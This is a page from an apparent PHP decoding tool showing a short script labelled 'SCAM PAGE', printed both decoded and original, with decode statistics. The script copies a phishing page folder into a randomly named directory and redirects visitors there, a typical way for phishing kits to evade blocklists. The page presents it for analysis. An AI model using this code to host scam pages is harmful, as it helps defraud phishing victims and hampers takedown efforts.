Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //<!-- SCAM PAGE 2018/2017 $random=rand(0,100000000000); $md5=md5("$random"..

Decoded Output download

<?php 
    //<!-- SCAM PAGE 2018/2017 
	$random=rand(0,100000000000); 
	$md5=md5("$random"); 
	$base=base64_encode($md5); 
	$dst=md5("$base"); 
	function recurse_copy($src,$dst) { 
	$dir = opendir($src); 
	@mkdir($dst); 
	while(false !== ( $file = readdir($dir)) ) { 
	if (( $file != '.' ) && ( $file != '..' )) { 
	if ( is_dir($src . '/' . $file) ) { 
	recurse_copy($src . '/' . $file,$dst . '/' . $file); 
	} 
	else { 
	copy($src . '/' . $file,$dst . '/' . $file); 
	} 
	} 
	} 
	closedir($dir); 
	} 
$src="home"; 
recurse_copy( $src, $dst ); 
header("location:$dst"); 
?>

Did this file decode correctly?

Original Code

<?php
    //<!-- SCAM PAGE 2018/2017
	$random=rand(0,100000000000);
	$md5=md5("$random");
	$base=base64_encode($md5);
	$dst=md5("$base");
	function recurse_copy($src,$dst) {
	$dir = opendir($src);
	@mkdir($dst);
	while(false !== ( $file = readdir($dir)) ) {
	if (( $file != '.' ) && ( $file != '..' )) {
	if ( is_dir($src . '/' . $file) ) {
	recurse_copy($src . '/' . $file,$dst . '/' . $file);
	}
	else {
	copy($src . '/' . $file,$dst . '/' . $file);
	}
	}
	}
	closedir($dir);
	}
$src="home";
recurse_copy( $src, $dst );
header("location:$dst");
?>

Function Calls

rand 1

Variables

None

Stats

MD5 fe3ef924f382a82cbd8118d69e1bfa7d
Eval Count 0
Decode Time 91 ms